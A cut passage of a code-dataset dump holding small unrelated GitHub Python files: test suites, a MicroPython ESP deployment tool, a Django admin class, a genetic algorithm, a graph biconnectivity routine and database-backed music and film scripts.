main()\n","repo_name":"EdCarlosBicudo/UH-Data_analysis_with_Python","sub_path":"hy-data-analysis-with-python-summer-2021/part01-e10_detect_ranges/src/detect_ranges.py","file_name":"detect_ranges.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"48131299","text":"import json\nimport urlparse\n\nimport pytest\n\n\ndef get_hosts(source_data, skip_hosts=None):\n skip_hosts = skip_hosts or []\n hosts = []\n if isinstance(source_data, list):\n hosts = [source_data[0]]\n elif isinstance(source_data, dict):\n grouped_hosts = source_data[\"Hosts\"]\n instances = [weighted_instances.strip(\"()\").split(\"@\")[0] for weighted_instances in grouped_hosts.split()]\n instances = [\"//{}\".format(instance) if \"://\" not in instance else instance for instance in instances]\n hosts = [urlparse.urlparse(instance).hostname for instance in instances]\n hosts = filter(lambda x: x not in skip_hosts, hosts)\n return hosts\n\n\n@pytest.mark.request\n@pytest.mark.config\ndef test_source_host_in_cache(source_data, dnscache):\n hosts = get_hosts(source_data, skip_hosts=['localhost'])\n assert set(hosts) <= set(dnscache), \\\n \"Source has unresolved host: '{}'\".format(set(hosts) - set(dnscache))\n\n\n@pytest.mark.request\n@pytest.mark.config\ndef test_source_empty(source_data):\n hosts = get_hosts(source_data)\n assert bool(set(hosts)), \"Source has no hosts\"\n\n\ndef pytest_generate_tests(metafunc):\n conf_file = metafunc.config.option.config\n config = json.load(open(conf_file))\n dnscache_hosts = [item.split(\"=\")[0] for item in config[\"_DNSCACHE_\"]]\n sources = [(name, value) for name, value in config.items() if not name.startswith(\"_\")]\n if 'source_data' in metafunc.fixturenames:\n metafunc.parametrize(\"source_data\", [item[1] for item in sources], ids=[item[0] for item in sources])\n if 'dnscache' in metafunc.fixturenames:\n metafunc.parametrize(\"dnscache\", [dnscache_hosts])\n\n\n@pytest.mark.request\n@pytest.mark.config\ndef test_metainfo(pytestconfig):\n conf_file = pytestconfig.option.config\n config = json.load(open(conf_file))\n metainfo = config[\"_METAINFO_\"]\n assert metainfo[\"version\"] != 'undefined', \"version should be defined\"\n assert metainfo[\"sandbox_task\"].isdigit(), \"sandbox_task should be digit\"\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/runtime_tests/configuration/tests/test_request_config.py","file_name":"test_request_config.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42130440275","text":"import pytest\nfrom selenium.webdriver.android.webdriver import WebDriver\n\nfrom UI_tests_aut.main.read_data.properties.read_properties import PropertiesReader\nfrom UI_tests_aut.test.base.test_case_base import TestCaseBase\n\n\n@pytest.mark.skipif(PropertiesReader.if_save_running_time(), reason=\"Ignore test to save time running\")\n@pytest.mark.order(1)\n@pytest.mark.functional\nclass TestBrowserSession(TestCaseBase):\n\n def setup_class(self):\n self.driver: WebDriver = self.get_driver()\n self.url = PropertiesReader().load_properties_from_file('url').data\n\n def test_open(self):\n\n ''' implicit wait for all web-elements'''\n self.driver.implicitly_wait(2)\n self.driver.get(self.url)\n assert self.driver.current_url == 'https://www.saucedemo.com/'\n","repo_name":"DanielLepszy/PythonLearning","sub_path":"UI_tests_aut/test/pages/login_page_tests/test_open_browser.py","file_name":"test_open_browser.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70818155114","text":"import urequests as requests\nimport time\nimport machine\n\ntz_offset = -8 # PST\n\ndef set_time():\n # network must be up first\n r = requests.get('http://date.jsontest.com')\n mils = r.json()['milliseconds_since_epoch']\n r.close() # saw documentation says this must be done manually\n mils += tz_offset * 3600 * 1000 # timezone\n time_tuple = time.localtime(mils // 1000)\n time_tuple = time_tuple[0:3] + (0,) + time_tuple[3:6] + (0,)\n machine.RTC().datetime(time_tuple)\n \nif __name__ == '__main__':\n set_time()","repo_name":"Yossi/car-menora","sub_path":"micropython/set_time.py","file_name":"set_time.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25856731047","text":"from taroc import JobInstances\nfrom tarocapp.model import JobInstancesModel\nfrom test.util import *\n\n\ndef test_add_jobs_update():\n # Given\n observed = 0\n\n def model_update(model, event):\n # Then:\n assert sut == model\n assert JobInstances([J1_2, J2_1]) == event.new_instances\n nonlocal observed\n observed += 1\n\n any_ = 3\n sut = JobInstancesModel(any_)\n sut.add_host_jobs('any', [J1_1])\n sut.observers.append(model_update)\n\n # When:\n sut.add_host_jobs('any', [J1_2, J2_1])\n\n # Then:\n assert observed == 1\n\n\ndef test_add_error_update():\n observed = 0\n\n def model_update(_, event):\n assert len(event.new_instances) == 0\n nonlocal observed\n observed += 1\n\n sut = JobInstancesModel(1)\n sut.observers.append(model_update)\n\n sut.add_host_error('any', None)\n\n assert observed == 1\n","repo_name":"StanSvec/taroc","sub_path":"test/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5263731948","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\n\napidoc = subprocess.run(['./node_modules/.bin/jsdoc2md', '-d', '4', 'gaussian-analytics.js'],\n stdout=subprocess.PIPE).stdout.decode('utf8').splitlines()\n\nwith open('README.md') as f:\n readme = f.readlines()\n\nwith open('README.md', 'w') as f:\n in_apidoc = False\n for line in readme:\n if in_apidoc:\n if '## History' in line:\n in_apidoc = False\n if not in_apidoc:\n f.write(line)\n if '## API Documentation' in line:\n in_apidoc = True\n f.write(os.linesep)\n for apidoc_line in apidoc:\n f.write(apidoc_line + os.linesep)","repo_name":"luphord/gaussian-analytics","sub_path":"update-api-docs.py","file_name":"update-api-docs.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"6621054834","text":"from django.contrib import admin\nfrom django_audit_fields.admin import audit_fieldset_tuple\nfrom edc_form_label.form_label_modeladmin_mixin import FormLabelModelAdminMixin\nfrom edc_model_admin import SimpleHistoryAdmin\n\n\nfrom ...admin_site import inte_subject_admin\nfrom ...forms import HivInitialReviewForm\nfrom ...models import HivInitialReview\nfrom ..modeladmin import CrfModelAdminMixin\n\n\n@admin.register(HivInitialReview, site=inte_subject_admin)\nclass HivInitialReviewAdmin(\n CrfModelAdminMixin, FormLabelModelAdminMixin, SimpleHistoryAdmin\n):\n\n form = HivInitialReviewForm\n\n fieldsets = (\n (None, {\"fields\": (\"subject_visit\", \"report_datetime\")}),\n (\n None,\n {\n \"fields\": (\n \"diagnosis_date\",\n \"treatment_start_date\",\n \"treatment_start_date_estimated\",\n \"lifestyle_management\",\n \"on_treatment\",\n \"treatment\",\n ),\n },\n ),\n audit_fieldset_tuple,\n )\n\n filter_horizontal = (\"treatment\",)\n\n radio_fields = {\n \"lifestyle_management\": admin.VERTICAL,\n \"treatment_start_date_estimated\": admin.VERTICAL,\n \"on_treatment\": admin.VERTICAL,\n }\n","repo_name":"inte-africa-trial/inte-subject","sub_path":"inte_subject/admin/general_assessment/hiv_initial_review_admin.py","file_name":"hiv_initial_review_admin.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25733889600","text":"from models import Population\nfrom models import Citizen\nfrom utility import randint_bound, choice, rand\n\n\nclass PopulationGen(Population):\n def __init__(self, pop_size, best_pop, p_m):\n super().__init__(pop_size)\n self.best_pop = best_pop\n self.p_m = p_m\n\n def create_pop(self):\n return [Citizen() for _ in range(self.pop_size)]\n\n def make_crossover(self, pop=[]):\n children = []\n for _ in range(self.best_pop, self.pop_size):\n child = []\n if pop:\n p1, p2 = self.select_parents(len(pop))\n child = self.cross(pop[p1], pop[p2])\n else:\n p1, p2 = self.select_parents()\n child = self.cross(self.population[p1], self.population[p2])\n self.mutate(child)\n children.append(child)\n self.population = self.population[:self.best_pop] + children\n\n def cross(self, p1, p2):\n v_p1 = p1.get_values()\n v_p2 = p2.get_values()\n cut_p = randint_bound(1, 3)\n v_child = v_p1[:cut_p] + v_p2[cut_p:]\n return Citizen(v_child)\n\n def select_parents(self, len_pop=0):\n return choice(len_pop if len_pop else self.best_pop, 2)\n\n def mutate(self, citizen):\n if (rand() * 100) < self.p_m:\n pos = randint_bound(4)\n citizen.set_value(pos)\n\n def get_best_pop(self):\n return self.population[:self.best_pop]\n","repo_name":"ricmtz/Modular","sub_path":"evolutionary/pop_gen.py","file_name":"pop_gen.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17847834485","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nimport uvicorn\nimport model as model\n\napp = FastAPI()\n\n\nclass Question(BaseModel):\n content: str\n\n\n@app.post(\"/ask\")\nasync def ask_question(question: Question):\n # use the model to get the answer\n answer = model.get_answer(question.content)\n\n return {\"answer\": answer}\n\n\n@app.get(\"/info\")\nasync def getInfo():\n return {\"info\": \"Use this API to ask Josh any question\"}\n\nif __name__ == '__main__':\n uvicorn.run('main:app', host='0.0.0.0', port=80)\n","repo_name":"joshhamwee/cv-chatbot","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35545452089","text":"# 文字內容\ntext = '''人生短短幾個秋啊\n不醉不罷休\n東邊我的美人哪\n'''\n\n# 寫入檔案\nwith open(\"./8-2.txt\", \"w\", encoding=\"utf-8\") as f:\n f.write(text)\n\n# 寫入最後一行 (附加文字在檔案內容最後一行)\nwith open(\"./8-2.txt\", \"a\", encoding=\"utf-8\") as f:\n f.write(\"西邊黃河流\" + \"\\n\")","repo_name":"telunyang/python_basics","sub_path":"examples/8-2.py","file_name":"8-2.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"33735504323","text":"\nimport glob\nimport os\nimport re\nimport json\ncv_data={}\ntasks=[0,1,2,3]\nfor st in tasks:\n cv_data[st]={}\n print(\"[LOAD] result_st\"+str(st)+\"/info_cv.json\")\n obj=json.load(open(\"result_st\"+str(st)+\"/info_cv.json\"))\n for k,fold in enumerate(obj):\n ls=[int(l[0]) for l in fold[\"test_labels\"]]\n if isinstance(fold[\"prediction_data\"][0][0],list):\n preds=[1 if float(pred[0][0]) > 0.5 else 0 for pred in fold[\"prediction_data\"]]\n score=[float(pred[0][0]) for pred in fold[\"prediction_data\"]]\n else:\n preds=[1 if float(pred[0]) > 0.5 else 0 for pred in fold[\"prediction_data\"]]\n score=[float(pred[0]) for pred in fold[\"prediction_data\"]]\n cv_data[st][k]=list(zip(fold[\"test_data_idx\"],ls,preds,score))\n\ndata={}\nfor st in tasks:\n filelist=glob.glob(\"./viz_st\"+str(st)+\"/*.jbl\")\n for f in filelist:\n #./viz_mm/fold3_2351_task_0_inactive_all_scaling.jbl\n name=os.path.basename(f)\n name,_=os.path.splitext(name)\n arr=name.split(\"_\")\n fold_s=arr[0]\n idx=int(arr[1])\n m=re.match(r\"fold([0-9]+)\",fold_s)\n if m:\n fold=int(m.group(1))\n if fold not in data:\n data[fold]=[]\n data[fold].append((idx,st,name))\n\nall_data=[]\nfor k,v in data.items():\n for el in v:\n idx=el[0]\n task=el[1]\n name=el[2]\n org_idx_pair=cv_data[task][k][idx]\n org_idx=org_idx_pair[0]\n l=org_idx_pair[1]\n pred=org_idx_pair[2]\n score=org_idx_pair[3]\n #all_data.append((org_idx,k,el[0],el[1],el[2]))\n all_data.append((org_idx,task,l,pred,score,k,idx,name))\n print(k,len(v))\n\nindex_data={}\nfor line in open(\"multimodal_data_index.csv\"):\n arr=line.strip().split(\",\")\n index_data[int(arr[0])]=arr[2]\n#print(index_data)\n\nprint(len(all_data))\nfp=open(\"summary_viz_st.tsv\",\"w\")\ns1=\"\\t\".join([\"compound ID\",\"task ID\",\"SMILES\",\"label\",\"prediction\",\"score\",\"fold ID\",\"fold index\",\"visualization filename\"])\nfp.write(s1)\nfp.write(\"\\n\")\nfor el in sorted(all_data):\n print(el)\n s1=\"\\t\".join(map(str,el[0:2]))\n s2=\"\\t\".join(map(str,el[2:]))\n smi=index_data[el[0]]\n fp.write(s1+\"\\t\"+smi+\"\\t\"+s2)\n fp.write(\"\\n\")\n\n","repo_name":"clinfo/kGCN","sub_path":"sample_chem/compound-protein_interaction/summarize_viz_st.py","file_name":"summarize_viz_st.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"71750088234","text":"#!/usr/bin/env python\n\nimport os\nimport subprocess\nimport time\n\nimport util.opt_parser as parser\nfrom util.toolkit import log, check_executable_exists, check_file_exists, properties, \\\n get_modified_files, execute_shell_command, execute_shell_command_get_output, read_file_to_list, \\\n check_folder_exists, remove_files_by_ext_recursively,timestamp_to_human_readable, \\\n get_subdirectory_structure_by_filelist, die\n\ntimestamp = 0\ntimestamp_file = parser.options.path + properties.osDirSeparator + properties.timeStampFilename\nskip_files = []\nstart_time = time.time()\n\nif parser.options.path == os.getcwd() and (parser.options.install or parser.options.skip or parser.options.profile):\n die(\"You tried to run espedite from within its own folder. Please cd to your code folder instead and run it from there.\")\n\n# Remove any compiled files\nremove_files_by_ext_recursively(parser.options.path, properties.binaryCodeExtension)\n\n# Read timestamp\nif check_file_exists(timestamp_file):\n with open(timestamp_file, 'r') as f:\n timestamp = f.readline().strip()\n log.debug(\"Last execution was on {} (UNIX Timestamp: {}) \".format(timestamp_to_human_readable(timestamp), str(timestamp)))\n\nlog.info(\"Running script in path '{}'\". format(parser.options.path))\n\ncheck_executable_exists(\"ampy\", True)\nif parser.options.connect:\n check_executable_exists(\"picocom\", True)\n\nmodified_relative_files = get_modified_files(parser.options.path, timestamp, True)\n\nif parser.options.skip:\n # READ SKIPFILE\n log.info(\"Reading skip file '{}' ....\".format(parser.options.skip))\n skip_files = read_file_to_list(parser.options.path + properties.osDirSeparator + parser.options.skip)\n\nif parser.options.uninstall:\n # UNINSTALL\n log.info(\"Uninstalling ....\")\n\n installed_files = execute_shell_command_get_output(\"sudo ampy --port /dev/ttyUSB0 ls /\").split(\"\\n\")\n\n for f in installed_files:\n # ampy returns an empty string at the end so skip that\n if f == \"\":\n continue\n log.info(\"Removing file or folder '{}' ....\".format(f))\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rmdir {}\".format(f), stderr=subprocess.PIPE)\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm {}\".format(f), stderr=subprocess.PIPE)\n\n # Remove timestamp file\n try:\n os.remove(timestamp_file)\n log.info(\"Removing timestamp file '{}' ....\".format(timestamp_file))\n except OSError:\n pass\n\n log.info(\"Uninstallation complete ....\")\n\nif modified_relative_files and parser.options.install:\n # print(get_subdirectory_structure(parser.options.path))\n\n if parser.options.compile:\n # COMPILE\n log.info(\"Compiling ....\")\n\n if not check_folder_exists(os.getcwd() + properties.osDirSeparator + \"micropython\"):\n log.debug(\"Compiling the compiler ...\"),\n pushd = os.getcwd()\n execute_shell_command(\"git clone https://github.com/micropython/micropython\")\n os.chdir(os.getcwd() + \"/micropython/mpy-cross\")\n execute_shell_command(\"make\")\n os.chdir(pushd)\n\n for f in modified_relative_files:\n extension = os.path.splitext(f)[1]\n if extension == properties.sourceCodeExtension:\n log.info(\"Compiling file {}\".format(f))\n execute_shell_command(\"{}/micropython/mpy-cross/mpy-cross {}\".format(os.getcwd(), parser.options.path + properties.osDirSeparator + f))\n\n\n if parser.options.install or parser.options.profile:\n log.info(\"Installing ....\")\n\n # Create folder structure for modified files\n dir_structure = get_subdirectory_structure_by_filelist(modified_relative_files)\n log.info(\"Creating folder structure (if required)\")\n for d in dir_structure:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 mkdir {}\".format(d), stderr=subprocess.PIPE)\n\n # Do this for all files modified or new\n for f in modified_relative_files:\n # Skip if it's included in the skip file\n if f in skip_files:\n log.debug(\"Skipping '{}' although it was modified\".format(f))\n continue\n log.info(\"Installing file '{}'\".format(f))\n\n # Remove file to be uploaded\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm {}\".format(f), stderr=subprocess.PIPE)\n\n # Remove compiled file if exist\n if os.path.splitext(f)[1] == properties.sourceCodeExtension:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm {}{}\".format(os.path.splitext(f)[0],\n properties.binaryCodeExtension), stderr=subprocess.PIPE)\n\n # Prefer to install compiled file rather than source\n if parser.options.compile and os.path.splitext(f)[1] == properties.sourceCodeExtension:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(parser.options.path + properties.osDirSeparator +\n os.path.splitext(f)[0] + properties.binaryCodeExtension,\n os.path.splitext(f)[0] + properties.binaryCodeExtension))\n\n # Workaround for these two files only since Micropython expects the uncompiled versions to be present as well\n if f in ['main.py', 'boot.py']:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(parser.options.path + properties.osDirSeparator + f, f))\n\n # Otherwise upload original file\n else:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(parser.options.path + properties.osDirSeparator + f, f))\n\n # Apply selected profile\n if parser.options.profile and check_folder_exists(\"{}/profile/{}\".format(parser.options.path, parser.options.profile)):\n log.info(\"Applying profile '{}'\".format(parser.options.profile))\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm main.py\", stderr=subprocess.PIPE)\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm main.mpy\", stderr=subprocess.PIPE)\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm conf/profile.properties\", stderr=subprocess.PIPE)\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(\"{}/profile/{}/{}\".format(parser.options.path, parser.options.profile, \"main.mpy\"), \"main.mpy\"))\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(\"{}/profile/{}/{}\".format(parser.options.path, parser.options.profile, \"main.py\"), \"main.py\"))\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(\"{}/profile/{}/conf/{}\".format(parser.options.path, parser.options.profile, \"profile.properties\"), \"conf/profile.properties\"))\n\n # Write installation timestamp\n with open(timestamp_file, \"w\") as text_file:\n text_file.write(\"{}\\n\".format(time.time()))\n\nelif parser.options.install and not modified_relative_files:\n log.warn(\"No modified files detected since last execution on {}. Installation skipped.\".format(timestamp_to_human_readable(timestamp)))\n\n\nlog.info(\"Execution time '{} sec'\".format(time.time() - start_time))\n\nif parser.options.connect:\n # CONNECT\n log.info(\"Connecting to '{}' ....\".format(parser.options.device))\n execute_shell_command(\"sudo picocom --baud 115200 /dev/ttyUSB0\")\n\n\n\n# Salute!\nlog.info(\"Bye bye! :-)\")\n","repo_name":"idimitrakopoulos/espedite","sub_path":"espedite.py","file_name":"espedite.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"73318171754","text":"\"\"\"\nScript that links:\n1) Artists to their Albums.\n2) Albums to their Artists and Songs.\n3) Songs to their Artists and Album.\n\n(Pseudocode)\nGet 'spotify_artists_data.jsonc' data\n\nfor artist_id in spotify_artists_data:\n # Get the artist\n artist: dict = spotify_artists_data[artist_id]\n\n # Get the artist's albums.\n artist_albums: List[dict] = artist['albums']\n\n # Iterate through artist's albums.\n for album in artist_albums:\n # Get the album document by spotify id\n # ! If album not found, throw error\n album_doc = Album.objects(spotifyId=artist_album['spotify_id'])[0]\n\n # Get the album's artists.\n album_artists = album['artists']\n\n # Iterate through the album's artists\n for album_artist in album_artists:\n # Get the artist document by spotify id\n # ! If artist not found, throw Error.\n album_artist_doc = Artist.objects(spotifyId=album_artist['id'])[0]\n\n # Link album's artists with album, and vice versa.\n # Check if album_artist --> album\n if album_artist_doc.id not in album_doc.artists:\n album_doc.artists.append(album_artist_doc.id)\n album_doc.save()\n\n # Check if album --> album_artist:\n if album_doc.id not in album_artist_doc.albums:\n album_artist_doc.albums.append(album_doc.id)\n album_artist_doc.save()\n\n # Iterate through the album's tracks\n for track in album['tracks']:\n # Get the track document by spotify id\n # ! If track not found, throw Error.\n track_doc = Track.objects(spotifyId=track['spotify_id'])[0]\n\n # Link track with it's album, and vice versa\n # Check if track --> album\n if track_doc.id not in album_doc.tracks:\n album_doc.tracks.append(track_doc.id)\n album_doc.save()\n\n # Check if album --> track:\n if album_doc.id != track_doc.album:\n track_doc.album = album_doc.id\n track_doc.save()\n\n # Iterate through track's artists.\n for track_artist in track['artists']:\n # Get the track's artist by spotify id\n # ! If artist not found, throw Error.\n track_artist_doc = Artist.objects(spotifyId=track_artist['id'])\n\n # Link track with it's artist(s), and vice versa\n # Check if track_artist --> track\n if track_artist_doc.id not in track_doc.artists:\n track_doc.artists.append(track_artist_doc.id)\n track_doc.save()\n\"\"\"\nimport os\nimport json\nimport time\nimport mongoengine\nfrom bson.objectid import ObjectId\n\nfrom typing import List\n\nfrom music_scraper.artist import Artist\nfrom music_scraper.album import Album\nfrom music_scraper.track import Track\n\nprint('--- RUNNING LINK DB ARTIST ALBUM SONG SCRIPT ---')\nstart_time = time.time()\n\nprint('Connecting to database...')\nmongodb_uri = os.environ['MONGODB_URI']\nmongoengine.connect('development', host=mongodb_uri)\n\nprint('Loading artist data set...')\nwith open(file=r'samples/responses/spotify_artists_data.jsonc', mode='r') as spotify_artists_data_file:\n artists_data: dict = json.load(fp=spotify_artists_data_file)\n\ndef check_if_album_contains_artist(artist_id, album_doc: Album) -> bool:\n for album_artist in album_doc.artists:\n if isinstance(album_artist, Artist):\n return artist_id == album_artist.id\n elif isinstance(album_artist, ObjectId):\n return artist_id == album_artist\n \n return False\n\ndef check_if_artist_contains_album(album_id, artist_doc: Artist) -> bool:\n for artist_album in artist_doc.albums:\n if isinstance(artist_album, Album):\n return album_id == artist_album.id\n elif isinstance(artist_album, ObjectId):\n return album_id == artist_album\n\n return False\n\ndef check_if_album_contains_track(track_id, album_doc: Album) -> bool:\n for track in album_doc.tracks:\n if isinstance(track, Track):\n return track_id == track.id\n elif isinstance(track, ObjectId):\n return track_id == track\n\n return False\n\ndef check_if_track_contains_album(album_id, track_doc: Track) -> bool:\n if isinstance(track_doc.album, Album):\n return album_id == track_doc.album.id\n elif isinstance(track_doc.album, ObjectId):\n return album_id == track_doc.album\n elif track_doc.album is None:\n return False\n else:\n raise TypeError(\"Track document's type is neither Album or ObjectId\")\n\ndef check_if_track_contains_artist(artist_id, track_doc: Track) -> bool:\n for artist in track_doc.artists:\n if isinstance(artist, Artist):\n return artist_id == artist.id\n if isinstance(artist, ObjectId):\n return artist_id == artist\n\n return False\n \n\nprint('Starting script.')\nfor index, artist_id in enumerate(artists_data):\n print('Getting {} artist'.format(index + 1))\n # Get the artist\n artist: dict = artists_data[artist_id]\n\n # Get the artist's albums.\n artist_albums: List[dict] = artist['albums']\n\n # Iterate through artist's albums.\n for album in artist_albums:\n # Get the album document by spotify id\n # ! If album not found, throw Error.\n album_doc: Album = Album.objects(\n spotifyId=album['spotify_id']).first()\n\n # Get the album's artists.\n album_artists: List[dict] = album['artists']\n\n # Iterate through the album's artists\n for album_artist in album_artists:\n # Get the artist document by spotify id\n # ! If artist not found, throw Error.\n album_artist_doc: Artist = Artist.objects(spotifyId=album_artist['id']).first()\n\n if album_artist_doc != None:\n # Link album's artists with album, and vice versa.\n # Check if album_artist --> album\n if not check_if_album_contains_artist(artist_id=album_artist_doc.id, album_doc=album_doc):\n album_doc.artists.append(album_artist_doc.id)\n album_doc.save()\n\n # Check if album --> album_artist:\n if not check_if_artist_contains_album(album_id=album_doc.id, artist_doc=album_artist_doc):\n album_artist_doc.albums.append(album_doc.id)\n album_artist_doc.save()\n\n # Iterate through the album's tracks\n for track in album['tracks']:\n # Get the track document by spotify id\n # ! If track not found, throw Error.\n track_doc: Track = Track.objects(spotifyId=track['spotify_id']).first()\n\n if track_doc != None:\n # Link track with it's album, and vice versa\n # Check if track --> album\n if not check_if_album_contains_track(track_id=track_doc.id, album_doc=album_doc):\n album_doc.tracks.append(track_doc.id)\n album_doc.save()\n\n # Check if album --> track:\n if not check_if_track_contains_album(album_id=album_doc.id, track_doc=track_doc):\n track_doc.album = album_doc.id\n track_doc.save()\n\n # Iterate through track's artists.\n for track_artist in track['artists']:\n # Get the track's artist by spotify id\n # ! If artist not found, throw Error.\n track_artist_doc: Artist = Artist.objects(\n spotifyId=track_artist['id']).first()\n\n if track_artist_doc != None:\n # Link track with it's artist(s), and vice versa\n # Check if track_artist --> track\n if not check_if_track_contains_artist(artist_id=track_artist_doc.id, track_doc=track_doc):\n track_doc.artists.append(track_artist_doc.id)\n track_doc.save()\n\nprint(\"--- DONE: %s seconds ---\" % (time.time() - start_time))\n","repo_name":"justinyum98/music-scraper","sub_path":"samples/run_5_link_artists_albums_songs.py","file_name":"run_5_link_artists_albums_songs.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74688680231","text":"from sys import stdin\nfrom sys import setrecursionlimit\n\ndef foundBCC(lo): # st[lo:] es un bcc\n global bccCnt, st,bcc\n if len(st)==0: return\n for i in range(lo,len(st)):\n u,v = st[i]\n bcc[(u,v)] = bcc[(v,u)] = bccCnt\n bccCnt+=1\n st = st[:lo]\n return\n\n\ndef articulationPoint(u):\n global num,low, dfsCounter, p ,a ,g , counterChild, dfsParent,bridge, bccCnt, st,bcc\n num[u] = low[u] = dfsCounter\n dfsCounter+=1\n for v in g[u]:\n if(num[v]==-1):\n st.append((u,v))\n p[v] = u\n if(dfsParent == u):\n counterChild+=1\n articulationPoint(v)\n if(low[v]>=num[u]):\n a[u] = True\n if(low[v]>num[u]):\n bridge.append([min(u,v),max(u,v)])\n ##Biconected Component\n for lo in range(len(st)-1, -1, -1):\n if st[lo]==(u,v):\n foundBCC(lo)\n break \n low[u] = min(low[u],low[v])\n elif( v != p[u]):\n low[u] = min(low[u],num[v])\n \ndef main():\n global num,low, dfsCounter, p,a,g, counterChild, dfsParent,bridge, bccCnt, st,bcc\n n,e = [int(x) for x in stdin.readline().strip().split()]\n num = [ -1 for x in range(n+1)]\n low = [ -1 for x in range(n+1)]\n p = [ x for x in range(n+1)]\n a = [ False for x in range(n+1)]\n st = list()\n bridge = list()\n bcc = {}\n g = [[] for i in range(n+1)]\n for G in range(e):\n u,v = [int(x) for x in stdin.readline().strip().split()]\n g[u].append(v)\n g[v].append(u)\n dfsCounter = 0\n bccCnt = 0\n \n for i in range(n):\n if(num[i]==-1):\n dfsParent = i\n counterChild = 0\n num[i] = low[i] = dfsCounter\n articulationPoint(i)\n foundBCC(0)\n a[i] = counterChild>1\n\n\n print(\"Puntos de articulacion\")\n for i in range(n):\n if(a[i]):\n print(i)\n print(\"Puentes\")\n for i in bridge:\n print(*i)\n print(\"Biconectados\")\n for u in bcc:\n print(u,bcc[u])\n \nmain()\n","repo_name":"CrkJohn/ECIGMA","sub_path":"graphs/Python/puntosPuentesBiconectados.py","file_name":"puntosPuentesBiconectados.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43538281455","text":"import pymysql\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Timeline, Bar, Grid\n\n# 上映年份\nshowtime = []\n# 查询中外电影上映年份\ndef select_showtime():\n try:\n # 打开数据库连接\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='123456', db='douban', charset='utf8')\n # 使用cursor方法创建一个游标\n cursor = conn.cursor()\n # 查询数据表数据\n # 查询上映年份\n sql = \"select distinct showtime from tb_film where showtime is not null order by showtime \"\n cursor.execute(sql)\n rows = cursor.fetchall()\n showtime.clear()\n for row in rows:\n showtime.append(row[0])\n # print(showtime)\n except Exception as e:\n print(e)\n # 回滚\n conn.rollback()\n finally:\n # 关闭cursor对象\n cursor.close()\n # 关闭数据库连接\n conn.close()\n return showtime\n\n\n# 查询评论人数Top10的电影\ndef select_film(i):\n # 电影名称集合\n filmname = []\n # 评论人数集合\n comment = []\n try:\n # 打开数据库连接\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='123456', db='douban', charset='utf8')\n # 使用cursor方法创建一个游标\n cursor = conn.cursor()\n # 查询数据表数据\n # 查询电影评论人数前十的电影\n cursor.execute(\"select filmname,comments from tb_film where comments is not null and showtime > 0 and showtime <= %d order by comments desc limit 10\"%(i))\n # 电影名称、评论人数数集合\n name_list = cursor.fetchall()\n for row in name_list:\n # 电影名称集合\n filmname.append(row[0])\n # 评论人数集合\n comment.append(row[1])\n filmname.reverse()\n comment.reverse()\n # print(filmname)\n # print(comment)\n except Exception as e:\n print(e)\n # 回滚\n conn.rollback()\n finally:\n # 关闭cursor对象\n cursor.close()\n # 关闭数据库连接\n conn.close()\n return filmname, comment\n\ndef select_data(year):\n film_list=select_film(year)\n colors = [\n \"#546570\", \"#c4ccd3\", \"#bda29a\", \"#ca8622\", \"#d48265\",\n \"#6e7074\", \"#749f83\", \"#61a0a8\", \"#2f4554\", \"#c23531\",\n \"#6e7074\", \"#749f83\", \"#61a0a8\", \"#2f4554\", \"#c23531\"\n 